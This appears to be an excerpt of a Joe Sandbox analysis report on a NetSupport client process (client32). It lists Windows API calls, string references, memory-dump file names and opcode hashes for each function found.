                                                                                                                • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenwvsprintf
                                                                                                                • String ID: Error %d Opening regkey %s
                                                                                                                • API String ID: 1772833024-3994271378
                                                                                                                • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                                • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                                APIs
                                                                                                                • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                Strings
                                                                                                                • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Closewvsprintf
                                                                                                                • String ID: Error %d closing regkey %x
                                                                                                                • API String ID: 843752472-892920262
                                                                                                                • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                                                • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,02AEB8C8,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                                                  • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                • String ID: NSMTRACE
                                                                                                                • API String ID: 4133054770-4175627554
                                                                                                                • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                                • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                                                • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                                • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: psapi.dll
                                                                                                                • API String ID: 1029625771-80456845
                                                                                                                • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                                • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                                                • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                                • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: nslsp.dll
                                                                                                                • API String ID: 1029625771-3933918195
                                                                                                                • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                                                                • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 110750EF
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1654520187-0
                                                                                                                • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                                • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                                                • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                                • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                • std::exception::exception.LIBCMT ref: 110608C3
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1338273076-0
                                                                                                                • Opcode ID: f53edd8a3547965c10928d98d0274f9b7efb0488a05ac9eb6089c88382d9505c
                                                                                                                • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                                                • Opcode Fuzzy Hash: f53edd8a3547965c10928d98d0274f9b7efb0488a05ac9eb6089c88382d9505c
                                                                                                                • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _malloc_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1183979061-0
                                                                                                                • Opcode ID: 30119d087e067e0d7fd8ccd6e1b50501c0c2e4bd173188fdf4aa3c61b116ce74
                                                                                                                • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                                                                • Opcode Fuzzy Hash: 30119d087e067e0d7fd8ccd6e1b50501c0c2e4bd173188fdf4aa3c61b116ce74
                                                                                                                • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 110886DF
                                                                                                                • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 453477542-0
                                                                                                                • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                                • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                                                • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                                • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                                                • ExtractIconExA.SHELL32(?,00000000,00050437,00020451,00000001), ref: 11145068
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExtractFileIconModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3911389742-0
                                                                                                                • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                                                • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                                • __lock_file.LIBCMT ref: 11164CBE
                                                                                                                  • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                                                • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                                                • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                                                  • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                                                • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
